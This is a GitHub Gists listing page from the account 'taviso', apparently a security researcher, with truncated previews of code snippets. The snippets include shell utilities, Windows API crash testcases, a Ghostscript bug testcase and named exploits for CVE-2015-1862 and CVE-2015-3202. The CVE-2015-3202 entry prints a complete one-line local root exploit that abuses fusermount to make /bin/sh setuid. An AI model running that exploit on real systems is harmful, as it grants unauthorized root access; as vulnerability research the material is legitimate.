Skip to content

Instantly share code, notes, and snippets.

taviso / fwpacl.c
Created May 14, 2020
Attempt to reset a FWP Engine Security Descriptor.
View fwpacl.c
#include <stdio.h>
#include <windows.h>
#include <fwpmu.h>
#include <sddl.h>
#include <malloc.h>
// Attempt to reset a FWP Engine Security Descriptor.
// For
taviso /
Last active Dec 17, 2019
Using to parse options
# $ bash --my_opt=foo --my_opt bar
# option_index was int:0
# foo
# option_index was int:0
# bar
if ! source; then
echo please install
taviso /
Created Aug 29, 2019
UNIX signals as emoji
declare -ar _status=(
[ 0]=😀 # Success
[ 1]=🤨 # Error
[129]=📞 # SIGHUP
[130]=🛑 # SIGINT
[131]="(╯°□°)╯︵ ┻━┻" # SIGQUIT
[132]=👮 # SIGILL
[133]=🐍 # SIGTRAP
[134]=💥 # SIGABRT
taviso / fbmon.c
Last active Jul 22, 2019
fbmon bug
View fbmon.c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
$ gcc fbmon.c
$ ./a.out
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)
taviso /
Created Jul 12, 2019
Read MSDN pages in a terminal.
# man equivalent for msdn pages so I can look them up in the console.
function msdn()
local lucky=""
local query=""
local title="Microsoft Developer Network"
local cache="${HOME}/.msdn/"
if ! type lynx > /dev/null; then
echo "error: lynx is not installed, please install it." 1>&2
taviso /
Last active Aug 30, 2018
GhostScript Testcase
% This is ghostscript bug #699687 (split out from bug #699654)
% ImageMagick define setpagedevice, just remove their definition. This doesn't
% do anything if not using ImageMagick.
userdict /setpagedevice undef
% function to check if we're on Linux or Windows
/iswindows {
% Just checking if paths contain drive
taviso / DefText.c
Created Nov 8, 2017
NtUserDefSetText() in Windows 10 will panic if you set the ansi flag incorrectly.
View DefText.c
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "user32")
#pragma comment(lib, "gdi32")
typedef struct _LARGE_STRING {
ULONG Length;
ULONG MaximumLength:31;
taviso / delete-twitter-dm.js
Created Nov 3, 2017
Automate deleting twitter direct messages.
View delete-twitter-dm.js
// Open direct messages window, paste this into console.
function deleteNextConversation()
if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) {
setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000);
taviso / CVE-2015-3202
Created May 21, 2015
Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
View CVE-2015-3202
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
# $b is used twice, first to build the contents of shellscript $a, and then as
taviso / raceabrt.c
Created Apr 14, 2015
Race condition exploit for CVE-2015-1862
View raceabrt.c
#include <stdlib.h>
#include <unistd.h>
#include <stdbool.h>
#include <stdio.h>
#include <signal.h>
#include <err.h>
#include <string.h>
#include <alloca.h>
#include <limits.h>
#include <sys/inotify.h>
You can’t perform that action at this time.